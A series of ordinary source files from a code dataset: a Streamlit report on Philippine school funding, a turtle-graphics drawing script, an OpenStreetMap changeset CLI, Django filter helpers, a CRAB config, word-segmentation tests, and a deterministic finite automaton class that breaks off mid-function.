= st.beta_columns(2)\n with col1:\n data_sources = Image.open(\"data_sources.png\")\n st.image(data_sources)\n with col2:\n methodology = Image.open(\"methodology.png\")\n st.image(methodology)\n\n\ndef methodology():\n st.title('Methodology')\n methodology = Image.open(\"methodology.png\")\n st.image(methodology)\n\n\ndef city_income():\n st.title('City Income vs School Resources')\n st.subheader(\"Schools in cities with higher incomes have more educational resources.\")\n st.write(\"\")\n \n col1, col2 = st.beta_columns(2)\n with col1:\n st.write(\"City income was found to be positively correlated with total number of enrollees, teachers and classrooms.\")\n fig = plt.figure(figsize=(10, 8))\n\n sns.set_theme(style=\"white\")\n sns.set_context(context=\"paper\",font_scale=1.7)\n mask = np.triu(np.ones_like(corr, dtype=bool))\n # cmap = sns.light_palette(\"blue\", as_cmap=True)\n sns.heatmap(corr, mask=mask, cmap=\"twilight\", center=1, annot=True)\n st.pyplot(fig)\n \n with col2:\n option = st.selectbox(\n 'City Income vs:',\n ['Teacher Availability', 'Room Availability', 'Enrollment', 'Student-Teacher Ratio'])\n \n if option == \"Teacher Availability\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Schools_Teachers\"])\n plt.ylabel(\"Number of Teachers\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.86\")\n \n elif option == \"Room Availability\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Schools_Rooms\"])\n plt.ylabel(\"Number of Rooms Available\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.88\")\n \n elif option == \"Enrollment\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Schools_Enrollment\"])\n plt.ylabel(\"Enrolled Students\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.85\")\n \n elif option == \"Student-Teacher Ratio\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Student_Teacher_Ratio\"])\n # plt.title(\"Provincial Income Level vs Mean Student-Teacher Ratio\", fontsize=14)\n plt.ylabel(\"Student-Teacher Ratio\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.42\")\n\n\ndef boncodin():\n st.title('Actual MOOE vs Boncodin MOOE')\n col1, col2 = st.beta_columns([1,2])\n with col1:\n st.subheader(\"At a Glance\")\n st.image(\"mooe_diff.png\", caption=None, width=None, use_column_width=None, clamp=False, channels='RGB',\n output_format='auto')\n st.write(\"**Some schools receive less than the Boncodin MOOE, some more.**\")\n option = st.selectbox(\n 'Select Visualization:',\n ['Bar chart', 'Heatmap'])\n \n \n with col2:\n st.subheader(\"MOOE Differentials by Region\")\n \n if option == \"Bar chart\":\n \n mpr = region[\"MOOE_Diff\"].sort_values()\n fig = plt.figure(figsize=(10, 6), dpi=200)\n plt.barh(mpr.index, mpr.values)\n # plt.title(\"Regional MOOE Differentials\", fontsize = 16)\n plt.xlabel(\"MOOE Differential\", fontsize=12)\n plt.xticks(range(0, 250000000, 25000000))\n st.pyplot(fig)\n \n elif option == \"Heatmap\":\n \n variable = 'MOOE_Diff'\n\n vmin, vmax = merged_data['MOOE_Diff'].min(), merged_data['MOOE_Diff'].max()\n fig, ax = plt.subplots(1, figsize=(8, 6), dpi=200)\n merged_data.plot(column=variable, cmap='PuBu', linewidth=0.8, ax=ax, edgecolor='0.8', vmin=vmin, vmax=vmax)\n sm = plt.cm.ScalarMappable(cmap='PuBu', norm=plt.Normalize(vmin=vmin, vmax=vmax))\n cbar = fig.colorbar(sm)\n st.pyplot()\n st.write(\"\")\n st.write(\"NCR, Region 3, 4-A, 6, 5, 7 have **higher** MOOE differentials.\")\n st.write(\"CAR, CARAGA, Region 4-B, 9, 2 have **lower** MOOE differentials.\")\n\ndef conclusion():\n st.title('Conclusion and Recommendations')\n st.write(\"## What did we learn?\")\n st.write(\"### How are education resources distributed across the country?\")\n st.write(\"- MOOE allocation generally favors schools in higher-income cities, highlighting inequitable distribution.\")\n st.write(\"### Are there any schools, regions, or areas with resource deficiencies?\")\n st.write(\"- 897 schools received less than the Boncodin MOOE.\")\n st.write(\"- Some regions require more rooms and teachers per student.\")\n st.write(\"### Are the perceived discrepancies justified for resource needs?\")\n st.write(\"- Not necessarily. Some regions have lower MOOE differentials but require more resources (CAR, Region 2).\")\n st.write(\"## What can we do?\")\n st.write(\n \"### We recommend a reevaluation of the Boncodin Formula, to incorporate certain factors important to the specific contexts of schools, such as:\")\n st.write(\"- Travel time and cost from school to Division Office)\")\n st.write(\"- Poverty incidence\")\n st.write(\"- Vulnerability to natural and human-induced hazards\")\n\ndef references():\n st.title('References')\n \n st.subheader('[1] Building Better Learning Environments in the Philippines')\n st.write(\"World Bank Group. (2016). Building Better Learning Environments in the Philippines. Philippines education note,no. 4;. World Bank, Washington, DC. © World Bank. https://openknowledge.worldbank.org/handle/10986/24744 License: CC BY 3.0 IGO.\")\n \n st.subheader(\"[2] House Bill No. 473: An Act Regulating Class Size in All Public Schools and Appointing Funds Therefor\")\n st.write(\"Tinio, A. L., & Castro, F. L. (2016, June 30). House Bill No. 473: An Act Regulating Class Size in All Public Schools and Appointing Funds Therefor. House Bill No. 473. https://www.congress.gov.ph/legisdocs/basic_17/HB00473.pdf.\")\n \n st.subheader(\"[3] Class-size affects students' learning : DepEd. Philippine News Agency RSS\")\n st.write(\"Montemayor, M. T. (2018, March 19). Class-size affects students' learning : DepEd. Philippine News Agency RSS. https://www.pna.gov.ph/articles/1029281. \")\n\n st.subheader('[4] Enhanced Basic Education Information System (EBEIS) (2015)')\n st.write(\"\") \n\n st.subheader('[5] Comparing the DISADVANTAGE INDEX (DI) with GEOGRAPHICALLY ISOLATED AND DISADVANTAGED AREAS (GIDA)')\n st.write(\"Comparing the DISADVANTAGE INDEX (DI) with GEOGRAPHICALLY ISOLATED AND DISADVANTAGED AREAS (GIDA). DepEd, 2015.\") \n \n st.subheader('[6] Computation of Public Schools MOOE')\n st.write(\"Llego, M. A. (2015). Computation of Public Schools MOOE. https://www.teacherph.com/computation-public-schools-mooe/\") \n \n \n \nlist_of_pages = [\n \"The Project\",\n \"Background\",\n \"What is MOOE?\",\n \"Data Sources and Methodology\",\n \"City Income vs School Resources\",\n \"Gaps in School Resources\",\n \"Actual vs Boncodin MOOE\",\n \"Clustering\",\n \"Conclusion and Recommendations\",\n \"References\"\n]\n\nst.sidebar.title('Table of Contents')\nselection = st.sidebar.radio(\"Go to\", list_of_pages)\n\nif selection == \"The Project\":\n project()\n\nelif selection == \"Background\":\n background()\n\nelif selection == \"What is MOOE?\":\n what_is_mooe()\n\nelif selection == \"Data Sources and Methodology\":\n data_method()\n\nelif selection == \"City Income vs School Resources\":\n city_income()\n\nelif selection == \"Gaps in School Resources\":\n cluster.gaps()\n\nelif selection == \"Actual vs Boncodin MOOE\":\n boncodin()\n\nelif selection == \"Clustering\":\n cluster.clustering()\n\nelif selection == \"Conclusion and Recommendations\":\n conclusion()\n \nelif selection == \"References\":\n references()\n","repo_name":"romeoben/DSC7-Sprint1-TeamAaron","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"49657478293","text":"# import colorgram\nimport turtle as turtle_module\nimport random\n# Used to extract colours from an image\n# rgb_colours = []\n# colours = colorgram.extract(\"day_18_hirst_painting/image.jpg\", 30)\n# for colour in colours:\n# r = colour.rgb.r\n# g = colour.rgb.g\n# b = colour.rgb.b\n# new_colour = (r,g,b)\n# rgb_colours.append(new_colour)\n# print(rgb_colours)\n\nscreen = turtle_module.Screen()\nscreen.title(\"Rainbow colours - Unknown Turtle (2022)\")\nturtle_module.colormode(255)\nstephen = turtle_module.Turtle()\nstephen.shape(\"turtle\")\nstephen.speed(\"fastest\")\ncolour_list =[(248, 231, 27), (202, 12, 30), (238, 244, 250), (35, 91, 186), (232, 229, 4), (232, 149, 48), (197, 68, 22), (212, 13, 9), (35, 31, 152), (49, 220, 60), (241, 46, 151), (20, 22, 53), (14, 208, 224), (75, 9, 53), (17, 154, 18), (55, 26, 13), (80, 193, 223), (219, 23, 116), (232, 159, 8), (241, 64, 24), (221, 138, 191), (96, 75, 10), (247, 11, 9), (83, 238, 162), (11, 96, 63), (5, 35, 33), (89, 208, 147)]\n\nstephen.penup()\nstephen.hideturtle()\nstephen.setheading(225)\nstephen.forward(300)\nstephen.setheading(0)\nnumber_of_dots = 100\nfor dot_count in range(1, number_of_dots + 1):\n stephen.dot(20, random.choice(colour_list))\n stephen.forward(50)\n if dot_count % 10 == 0:\n stephen.setheading(90)\n stephen.forward(50)\n stephen.setheading(180)\n stephen.forward(500)\n stephen.setheading(0)\n\nscreen.exitonclick()\n","repo_name":"stiamh/100_days_of_code","sub_path":"day_18_hirst_painting/day_18_hirst_painting.py","file_name":"day_18_hirst_painting.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39729048922","text":"# -*- coding: utf-8 -*-\nimport click\n\nfrom osmcha.changeset import Analyse\n\n\n@click.command('osmcha')\n@click.argument('id', type=int, metavar='changeset_id')\ndef cli(id):\n \"\"\"Analyse an OpenStreetMap changeset.\"\"\"\n ch = Analyse(id)\n ch.full_analysis()\n click.echo(\n 'Created: %s. Modified: %s. Deleted: %s' % (ch.create, ch.modify, ch.delete)\n )\n if ch.is_suspect:\n click.echo('The changeset {} is suspect! Reasons: {}'.format(\n id,\n ', '.join(ch.suspicion_reasons)\n ))\n else:\n click.echo('The changeset %s is not suspect!' % id)\n","repo_name":"willemarcel/osmcha","sub_path":"osmcha/scripts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"19"} +{"seq_id":"17923801319","text":"from datetime import datetime\nfrom django.db.models import Q\n\ndef get_region_filter(region__initial):\n return (Q(events__region__initial=region__initial) | Q(events__city__region__initial=region__initial)) \n\ndef get_closed_events_filters(region__initial):\n today = datetime.today()\n if region__initial:\n HAS_BOTH_CORRECT_DATES = Q(get_region_filter(region__initial),events__from_date__lte=today,events__from_date__gte=today)\n HAS_UNDEFINED_ENDS_DATE = Q(get_region_filter(region__initial),events__from_date__lte=today,events__undefined_ends_date=True)\n else:\n HAS_BOTH_CORRECT_DATES = Q(events__from_date__lte=today,events__from_date__gte=today)\n HAS_UNDEFINED_ENDS_DATE = Q(events__from_date__lte=today,events__undefined_ends_date=True)\n return HAS_BOTH_CORRECT_DATES, HAS_UNDEFINED_ENDS_DATE","repo_name":"coronaaqui/services","sub_path":"cbrasil/cbrasil/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"21307124519","text":"from WMCore.Configuration import Configuration\nfrom CRABClient.UserUtilities import getUsernameFromSiteDB\n\nconfig = Configuration()\n\nconfig.section_(\"General\")\nconfig.General.requestName = rName\nconfig.General.workArea = dirName\nconfig.General.transferOutputs = True\nconfig.General.transferLogs = True\n\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'miniAOD2TTree_cfg.py'\nconfig.JobType.pyCfgParams = ''\nconfig.JobType.outputFiles = ['miniaod2tree.root']\n\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = dataset\nconfig.Data.inputDBS = 'global'\n#config.Data.inputDBS = 'phys03'\nconfig.Data.splitting = 'FileBased'\n#config.Data.totalUnits = 10\nconfig.Data.unitsPerJob = 5\nconfig.Data.publication = False\nconfig.Data.outLFNDirBase = '/store/user/%s/CRAB3_TransferData' % (getUsernameFromSiteDB())\n\nconfig.section_(\"Site\")\nconfig.Site.storageSite = 'T2_FI_HIP'\n\n","repo_name":"sorda/HiggsAnalysis","sub_path":"MiniAOD2TTree/test/crabConfig.py","file_name":"crabConfig.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19131872159","text":"import os\nimport pytest\n\nimport wordseg\nfrom wordseg import utils, Separator\nfrom wordseg.algos.dpseg import segment\nfrom . import prep\n\n\nargs = [\n '',\n '--ngram 1 --a1 0 --b1 1 --a2 0 -- b2 1',\n '--ngram 1 --a1 0.1 --b1 0.9 --do-mbdp 1',\n '--ngram 1 --a1 0 --b1 1 --forget-method P',\n '--ngram 1 --a1 0 --b1 1 --estimator V --mode batch',\n '--ngram 1 --a1 0 --b1 1 --estimator F',\n '--ngram 1 --a1 0 --b1 1 --estimator T',\n utils.strip('''\n --ngram 1 --a1 0 --b1 1 --estimator D --mode online --eval-maximize 1\n --eval-interval 50 --decay-rate 1.5 --samples-per-utt 20\n --hypersamp-ratio 0 --anneal-a 10 --burnin-iterations 1\n --anneal-iterations 0'''.replace('\\n', ' ')),\n]\n\n\n@pytest.mark.parametrize('nfolds, njobs', [(1, 1), (1, 4), (2, 2), (10, 1)])\ndef test_dpseg_parallel_folds(prep, nfolds, njobs):\n text = prep[:5]\n if nfolds > 5:\n with pytest.raises(ValueError):\n segment(text, nfolds=nfolds, njobs=njobs)\n else:\n assert len(list(segment(text, nfolds=nfolds, njobs=njobs))) == 5\n\n\n@pytest.mark.parametrize('args', args)\ndef test_dpseg_args(prep, args):\n segmented = segment(prep[:5], nfolds=1, args=args)\n assert len(list(segmented)) == 5\n\n\ndef test_config_files_are_here():\n confs = wordseg.algos.dpseg.get_dpseg_conf_files()\n assert len(confs) > 0\n for conf in confs:\n assert os.path.isfile(conf)\n assert conf[-5:] == '.conf'\n assert 'dpseg' in conf\n\n\n@pytest.mark.parametrize('conf', wordseg.algos.dpseg.get_dpseg_conf_files())\ndef test_dpseg_from_config_file(prep, conf):\n segmented = segment(prep[:5], nfolds=1, args='--config-file {}'.format(conf))\n assert len(list(segmented)) == 5\n","repo_name":"Rachine/wordseg","sub_path":"test/test_dpseg.py","file_name":"test_dpseg.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"24441087593","text":"#!/usr/bin/env python3\nimport sys, os, io\nfrom typing import Iterable, Tuple\nfrom graphviz import Source\nimport random\nimport itertools\nimport functools\n# from ltlf2dfa.parser.ltlf import LTLfParser\n# from .ltl import Formula\n\nimport typing\nfrom typing import *\n\nfrom typing import TypeVar, Hashable\nState = TypeVar('State', bound=Hashable)\nLetter = TypeVar('Letter', bound=Hashable)\n\n\nclass DFA(typing.Generic[State,Letter]):\n def __init__(self, *,\n init_state:'State',\n final_states:'Collection[State]',\n transitions:'Mapping[State,Mapping[Letter,State]]',\n ):\n self.final_states = self.accepting_states = final_states\n self.init_state = init_state\n self.init_states = [init_state]\n self.transitions = transitions\n self.states = list(transitions.keys())\n self.alphabet = list(transitions[init_state].keys())\n\n # Calculating number of words of length 0 accepted of length 0 from a state\n self.number_of_words = {(state, 0):int(state in self.final_states) for state in self.states}\n self.calculated_till = 0\n \n def translate(self, *,\n alphabet : 'Callable[[Letter],Letter] | Mapping[Letter, Letter] | Iterable[Letter]' = {},\n states : 'Callable[[State ],State ] | Mapping[State, State ] | Iterable[State ]' = {},\n ) -> 'DFA':\n \"\"\"Change the symbols and states of this automaton.\n Symbols and states can be collapsed to a single symbol.\n If a symbol is translated to `None`, the corresponding transitions are removed.\n \"\"\"\n\n if isinstance(alphabet, typing.Iterable) and not isinstance(alphabet, typing.Mapping):\n alphabet = {a:a2 for a,a2 in zip(self.alphabet,alphabet)}\n if isinstance(alphabet, typing.Callable):\n tr_a = functools.lru_cache(None)(alphabet)\n elif isinstance(alphabet, typing.Mapping):\n tr_a = lambda a: alphabet.get(a,a)\n else:\n raise TypeError(f\"alphabet: unexpected type {alphabet.__class__.__name__}\")\n \n if isinstance(states, typing.Iterable) and not isinstance(states, typing.Mapping):\n states = {s:s2 for s,s2 in zip(self.states,states)}\n if isinstance(states, typing.Callable):\n tr_s = functools.lru_cache(None)(states)\n elif isinstance(states, typing.Mapping):\n tr_s = lambda a: states.get(a,a)\n else:\n raise TypeError(f\"states: unexpected type {states.__class__.__name__}\")\n \n kwargs = dict()\n # kwargs['alphabet'] = alphabet2 = set(tr_a(a) for a in self.alphabet if tr_a(a) is not None)\n # kwargs['states'] = states2 = set(tr_s(s) for s in self.states)\n # kwargs['init_states'] = set(tr_s(s) for s in self.init_states)\n kwargs['final_states'] = set(tr_s(s) for s in self.final_states)\n kwargs['init_state'] = tr_s(self.init_state)\n kwargs['transitions'] = transitions2 = dict()\n for s,trans in self.transitions.items():\n trans2 = transitions2.setdefault(tr_s(s), dict())\n trans2.update((tr_a(a),tr_s(s2)) for a,s2 in trans.items() if tr_a(a) is not None)\n return __class__(**kwargs)\n \n @classmethod\n def product(cls, *dfas,\n synchronize:bool,\n alphabet : 'Callable[[Tuple[Letter]],Letter] | Mapping[Tuple[Letter], Letter] | Iterable[Letter]' = {},\n states : 'Callable[[Tuple[State ]],State ] | Mapping[Tuple[State], State ] | Iterable[State ]' = {},\n final : 'Callable[[Tuple[bool ]],bool ] | Mapping[Tuple[bool], bool ]' = all,\n ):\n if isinstance(final, typing.Callable):\n tr_f = functools.lru_cache(None)(final)\n elif isinstance(final, typing.Mapping):\n tr_f = lambda f: final.get(f,False)\n else:\n raise TypeError(f\"final: unexpected type {final.__class__.__name__}\")\n\n kwargs = dict()\n states2 = list(itertools.product(*(dfa.states for dfa in dfas)))\n kwargs['init_state'] = tuple(dfa.init_state for dfa in dfas)\n kwargs['final_states'] = set(\n s2\n for s2 in states2\n if tr_f(tuple(\n s in dfa.final_states\n for dfa,s in zip(dfas,s2)\n ))\n )\n kwargs['transitions'] = transitions2 = dict()\n for transitionss in itertools.product(*(dfa.transitions.items() for dfa in dfas)):\n ss, transs = zip(*transitionss)\n transitions2[ss] = {\n trs[0][0] if synchronize else\n tuple(tr[0] for tr in trs)\n : tuple(tr[1] for tr in trs)\n for trs in itertools.product(*(trans.items() for trans in transs))\n if not synchronize or len(set(tr[0] for tr in trs))==1\n }\n product = __class__(**kwargs)\n product = product.translate(alphabet=alphabet, states=states)\n return product\n \n def __invert__(self): return self.complement()\n\n def is_word_in(self, word):\n '''\n checks if a word belongs to the language of the DFA\n '''\n state = self.init_state\n for letter in word:\n state = self.transitions[state][letter]\n \n return state in self.final_states\n\n def complement(self):\n '''\n returns a complement of the self object\n '''\n comp_final_states = [state for state in self.states if state not in self.final_states]\n d = DFA(\n init_state=self.init_state,\n final_states=comp_final_states,\n transitions=dict(self.transitions),\n )\n return d\n\n def show(self, filename=\"test.gv\"):\n '''\n Produces an image of the DFA\n '''\n dot_str = \"digraph g {\\n\"\n\n dot_str += ('__start0 [label=\"start\" shape=\"none\"]\\n')\n\n for s in self.states:\n if s in self.final_states:\n shape = \"doublecircle\"\n else:\n shape = \"circle\"\n dot_str += ('{} [shape=\"{}\" label=\"{}\"]\\n'.format(s, shape, s))\n\n dot_str += ('__start0 -> {}\\n'.format(self.init_state))\n\n for s1 in self.transitions.keys():\n tran = self.transitions[s1]\n for letter in tran.keys():\n dot_str += ('{} -> {}[label=\"{}\"]\\n'.format(s1, tran[letter], letter))\n dot_str += (\"}\\n\")\n \n s = Source(dot_str, filename=filename, format=\"png\")\n s.view()\n \n\n def save(self, filename):\n with open(filename + \".dot\", \"w\") as file:\n file.write(\"digraph g {\\n\")\n file.write('__start0 [label=\"\" shape=\"none]\\n')\n\n for s in self.states:\n if s in self.final_states:\n shape = \"doublecircle\"\n else:\n shape = \"circle\"\n file.write('{} [shape=\"{}\" label=\"{}\"]\\n'.format(s, shape, s))\n\n file.write('__start0 -> {}\\n'.format(self.init_state))\n\n for s1 in self.transitions.keys():\n tran = self.transitions[s1]\n for letter in tran.keys():\n file.write('{} -> {}[label=\"{}\"]\\n'.format(s1, tran[letter], letter))\n file.write(\"}\\n\")\n\n\n def __str__(self):\n '''\n prints the dfas in a readable format\n '''\n output_str = ''\n output_str += 'Init: '+str(self.init_state) + '\\n'\n output_str += 'States: '+','.join(list(map(str, self.states))) + '\\n'\n output_str += 'Transitions:\\n'\n for state in self.transitions:\n for letter in self.alphabet:\n output_str += str(state)+ '-'+str(letter)+'->'+str(self.transitions[state][letter])+','\n output_str += '\\n'\n output_str += 'Final states: '+','.join(list(map(str,self.final_states)))\n return output_str\n\n def generate_all_accepting_words(self):\n '''\n returns all words that are accepted by DFA\n '''\n return self.generate_accepting_words(self.init_state)\n\n\n def generate_accepting_words(self, state):\n '''\n returns all words that are accepted by a DFA from a given state \n '''\n all_words = []\n if state in self.final_states:\n all_words += ['']\n\n for letter in self.alphabet:\n successor_states = self.transitions[state][letter]\n\n for next_state in successor_states:\n all_words += [letter+word for word in self.generate_accepting_words(next_state)]\n\n return all_words\n\n def generate_num_accepting_words(self, length=-1):\n '''\n Computes the number of words that are accepted of a particular length.\n Use negative lenght to compute for the shortest word lenght (which will be returned). \n '''\n for i in range(1,self.calculated_till+1): # empty word is buggy, hence starting at 1\n if length<0 and self.number_of_words[(self.init_state,i)] > 0: return i\n for i in range(self.calculated_till+1,(length if length>=0 else len(self.states))+1):\n for state in self.states:\n self.number_of_words[(state, i)] = sum(\n self.number_of_words[(self.transitions[state][letter], i-1)]\n for letter in self.alphabet\n )\n self.calculated_till = i\n if length<0 and self.number_of_words[(self.init_state,i)] > 0: return i\n return i\n\n\n def accepting_word(self):\n ''' returns a minimal word that is accepted\n '''\n # try: return self.generate_random_word_length(-1)\n # except RuntimeError: return None\n return word_with_labels((self,), (True,))\n\n def rejecting_word(self):\n ''' returns a minimal word that is rejected\n '''\n return word_with_labels((self,), (False,))\n \n def intersecting_word(self, *others):\n ''' returns a minimal word that is accepted by both dfas\n '''\n return word_with_labels(\n (self, *others),\n (True, *(True for o in others)),\n )\n\n def generate_random_word(self):\n '''\n returns any random word that is accepted\n '''\n random_length = random.randint(0,100)\n return self.generate_random_word_length(random_length)\n\n # Algorithm taken from https://link.springer.com/article/10.1007/s00453-010-9446-5\n def generate_random_word_length(self, length=-1):\n '''\n returns a random word of a particular length that is accepted\n '''\n length = self.generate_num_accepting_words(length)\n\n rand_word = tuple()\n state = self.init_state\n for i in range(1,length+1):\n transition_list = []\n prob_list = []\n num_accepted_trans = self.number_of_words[(state, length-i+1)]\n if num_accepted_trans == 0: raise RuntimeError(f\"no accepted word of length {length} exist\")\n for letter in self.alphabet:\n # for next_state in self.transitions[state][letter]: # this code is wrong because transitions[s][l] is a SINGLE state\n for next_state in self._next_states([state], letter):\n transition_list.append((letter, next_state))\n prob_list.append(self.number_of_words[(next_state, length-i)]/num_accepted_trans)\n\n next_transition = random.choices(transition_list, weights=prob_list)[0]\n state = next_transition[1]\n \n rand_word+=(next_transition[0],)\t\n return rand_word\n\n\n def generate_random_words_in_batch(self, length_range, batch_size):\n\n epsilon = 0.01\n \n if self.calculated_till < length_range[1]:\n self.generate_num_accepting_words(length_range[1])\n\n word_list = []\n last_path = [] \n prob_dict = {}\n length_list = list(range(length_range[0], length_range[1]+1))\n valid_length = []\n for l in length_list:\n if self.number_of_words[(self.init_state,l)] != 0:\n valid_length.append(l)\n\n if valid_length == []:\n raise Exception('No traces with the given lengths') \n\n transition_count = {}\n\n num=0\n for num in range(batch_size):\n \n rand_word = tuple()\n state = self.init_state\n length = random.choice(valid_length)\n \n \n for i in range(1,length+1):\n non_sink_transitions = [] #letters which lead to some accepting states\n prob_list = []\n count_list = []\n\n for letter in self.alphabet:\n \n next_state = self.transitions[state][letter]\n \n if (state, letter, next_state) not in transition_count:\n transition_count[(state, letter, next_state)] = 0\n \n #print(next_state, self.number_of_words[(next_state, length-i)], length-i)\n if self.number_of_words[(next_state, length-i)] != 0:\n non_sink_transitions.append((state, letter, next_state))\n \n\n\n count_list.append(transition_count[(state, letter, next_state)])\n\n\n num_accepted_trans = len(non_sink_transitions)\n total_count = sum(count_list)\n \n for j in range(len(self.alphabet)):\n next_state = self.transitions[state][self.alphabet[j]]\n if self.number_of_words[(next_state, length-i)] != 0:\n if num_accepted_trans == 1:\n transition_prob = 1\n elif total_count == 0:\n transition_prob = (1/num_accepted_trans)\n else:\n transition_prob = (1/num_accepted_trans)*(1-(count_list[j]/total_count))\n \n prob_list.append(transition_prob)\n \n \n \n prob_list = [(i/sum(prob_list)) for i in prob_list]\n \n next_transition = random.choices(non_sink_transitions, weights=prob_list)[0]\n transition_count[next_transition] += 1\n #print(\"Count\", transition_count)\n state = next_transition[2]\n rand_word+=(next_transition[1],)\n \n word_list.append(rand_word)\t\n\n return word_list\n \n\n\n @classmethod\n def from_RPNI(cls, RPNI_output_file_name):\n transitions = dict()\n with open(RPNI_output_file_name) as RPNI_output_file:\n mode = \"general\"\n for line in RPNI_output_file:\n if \"alphabet size\" in line:\n size = int(line.split(\"=\")[1].strip().strip(';'))\n # self.alphabet = list(range(size))\n if \"number of states\" in line:\n num_states = int(line.split(\"=\")[1].strip().strip(';'))\n # self.states = list(range(num_states))\n if \"initial states\" in line:\n mode = \"init\"\n continue\n if \"final states\" in line:\n mode = \"final\"\n continue\n if \"transitions\" in line:\n mode = \"transitions\"\n continue\n\n if mode == \"init\":\n line = line.strip().strip(';')\n listOfStates = line.split(',')\n init_states = [int(s) for s in listOfStates]\n if len(init_states) > 1:\n raise ValueError(\"the automaton has more than 1 initial state\")\n\n if mode == \"final\":\n line = line.strip().strip(';')\n listOfStates = line.split(',')\n accepting_states = list()\n for s in listOfStates:\n if s!= '':\n accepting_states.append(int(s))\n if accepting_states=='':\n accepting_states.append(int(random.choice(range(0,51))))\n\n if mode == \"transitions\":\n line = line.strip().strip(';')\n transition_description = line.split(',')\n transitions[(int(transition_description[0]), int(transition_description[1]))] = int(transition_description[2])\n \n dfa = cls(init_states[0], accepting_states, transitions)\n return dfa\n\n def export_as_RPNI_automaton(self, output_file=sys.stdout, *,\n keep_alphabet=False,\n ):\n if isinstance(output_file, str):\n context = output_file = open(output_file, \"w\")\n else:\n context = open(os.devnull,\"w\")\n with context:\n output_file.write('[general]\\n')\n output_file.write('\\tis dfa = true;\\n')\n output_file.write('\\talphabet size = {};\\n'.format(max(self.alphabet)+1 if keep_alphabet else len(self.alphabet)))\n output_file.write('\\tnumber of states = {};\\n'.format(len(self.states)))\n output_file.write('[initial states]\\n')\n output_file.write('\\t{};\\n'.format(\n ', '.join(str(self.states.index(init_state)) for init_state in self.init_states)\n ))\n output_file.write('[final states]\\n')\n output_file.write('\\t{};\\n'.format(\n ', '.join(str(self.states.index(accepting_state)) for accepting_state in self.accepting_states)\n ))\n output_file.write('[transitions]\\n')\n for (state_from,letter),state_to in self.transitions.items():\n output_file.write('\\t{}, {}, {};\\n'.format(\n self.states.index(state_from),\n letter if keep_alphabet else self.alphabet.index(letter),\n self.states.index(state_to),\n ))\n\n def export_dot(self, output_file=sys.stdout, *,\n keep_states=True, keep_alphabet=True,\n group_separator=r'\\n',\n ):\n \"\"\"\n :param group_separator: if set, group transitions between same pair of states. Usually set to ';' or r'\\n'.\n :type group_separator: str or None\n \"\"\"\n if isinstance(output_file, str):\n context = output_file = open(output_file, \"w\")\n else:\n context = open(os.devnull,\"w\")\n with context:\n \"\"\"\n inspiration from:\n src/automata_learning_utils/lib_RPNI/libalf/src/conjecture.cpp\n line 448: string finite_automaton::visualize()\n \"\"\"\n\n # head\n output_file.write('digraph finite_automaton {\\n')\n output_file.write('\\tgraph[fontsize=8];\\n')\n output_file.write('\\trankdir=LR;\\n')\n output_file.write('\\tsize=8;\\n\\n')\n\n # mark final states\n header_written = False\n final_state_count = 0\n const_iterator = {}\n\n if not keep_states:\n # final states\n if (len(self.accepting_states) > 0):\n output_file.write('\\tnode [shape=doublecircle, style=\"\", color=black];')\n for q,state in enumerate(self.states):\n if state not in self.accepting_states: continue\n output_file.write(' q{}'.format(q))\n output_file.write(';\\n')\n # normal states\n if (len(self.accepting_states) < len(self.states)):\n output_file.write('\\tnode [shape=circle, style=\"\", color=black];')\n for q,state in enumerate(self.states):\n if state in self.accepting_states: continue\n output_file.write(' q{}'.format(q))\n output_file.write(';\\n')\n else:\n # states\n for q,state in enumerate(self.states):\n shape = 'doublecircle' if state in self.accepting_states else 'circle'\n output_file.write('\\tnode [shape={}, label=\"{}\", style=\"\", color=black]; q{};\\n'.format(\n shape,\n state,\n q,\n ))\n\n # non-visible states for arrows to initial states\n if (len(self.init_states) > 0):\n output_file.write('\\tnode [shape=plaintext, label=\"\", style=\"\"];')\n for iq,init_state in enumerate(self.init_states):\n output_file.write(' iq{}'.format(iq))\n output_file.write(';\\n')\n\n # and arrows to mark initial states\n for iq,init_state in enumerate(self.init_states):\n output_file.write('\\tiq{} -> q{} [color=blue];\\n'.format(\n iq,\n self.states.index(init_state)\n ))\n\n # transitions\n if group_separator is None:\n # for (state_from,letter),state_to in self.transitions.items():\n for state_from,trans in self.transitions.items():\n for letter,state_to in trans.items():\n output_file.write('\\tq{} -> q{} [label=\"{}\"];\\n'.format(\n self.states.index(state_from),\n self.states.index(state_to),\n letter if keep_alphabet else self.alphabet.index(letter),\n ))\n else:\n grouped_transitions = {}\n # for (state_from,letter),state_to in self.transitions.items():\n for state_from,trans in self.transitions.items():\n for letter,state_to in trans.items():\n grouped_transitions.setdefault((state_from,state_to), set())\n grouped_transitions[(state_from,state_to)].add(letter)\n for (state_from,state_to),letters in 